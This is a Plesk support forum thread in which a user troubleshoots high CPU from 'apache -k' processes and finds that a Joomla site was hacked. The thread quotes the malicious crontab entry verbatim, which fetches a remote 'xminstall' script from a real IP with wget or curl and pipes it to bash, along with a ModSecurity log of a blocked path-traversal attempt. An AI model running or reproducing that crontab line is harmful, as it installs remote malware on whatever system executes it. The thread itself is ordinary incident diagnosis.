• Introducing WebPros Cloud - a fully managed infrastructure platform purpose-built to simplify the deployment of WebPros products !  WebPros Cloud enables you to easily deliver WebPros solutions — without the complexity of managing the infrastructure.
    Join the pilot program today!
  • Support for BIND DNS has been removed from Plesk for Windows due to security and maintenance risks.
    If a Plesk for Windows server is still using BIND, the upgrade to Plesk Obsidian 18.0.70 will be unavailable until the administrator switches the DNS server to Microsoft DNS.

Question High CPU usage process issue (apache -k)

Nicola

Basic Pleskian
Hi,
I have a problem with a domain, sometimes starting many processes that completely used the CPU (image attached). I can't find a solution and even looking on the internet I can't find anything about it.

What could I do to investigate further?

Thanks in advance
 

Attachments

  • processi.jpg
    processi.jpg
    126.5 KB · Views: 7
If I posted it's because I had already done the research.

More specifically, my question is: what are the processes with "apache -k" that you see in the image?
Can anyone tell me what it could be?
 
apache -k is used for an apache shutdown or restart. any indication in the logs what is causing the apache restarts?
 
joomla site was hacked. I found this in the user's crontab


Code:
MAILTO=""
1 * * * * (wget -q http://157.245.235.139/s/xminstall -O - || curl -fs http://157.245.235.139/s/xminstall)|bash

Looking at the logs I found this

Code:
[client 196.112.130.200] ModSecurity: [file "/etc/httpd/conf/modsecurity.d/rules/tortix/modsec/50_plesk_basic_asl_rules.conf"] [line "39"] [id "33340006"] [rev "68"] [msg "Protected by Atomicorp.com Basic Non-Realtime WAF Rules: Generic Path Recursion denied in URI/ARGS"] [data "../../,ARGS:albumid"] [severity "CRITICAL"] Access denied with code 403 (phase 2). Pattern match "\\\\.\\\\./\\\\.\\\\./" at ARGS:albumid. [hostname "old.cpia5milanocentrale.edu.it"] [uri "/index.php"] [unique_id "XZt@6RESvUG9QNLiorugrwAAANg"]
 
Back
Top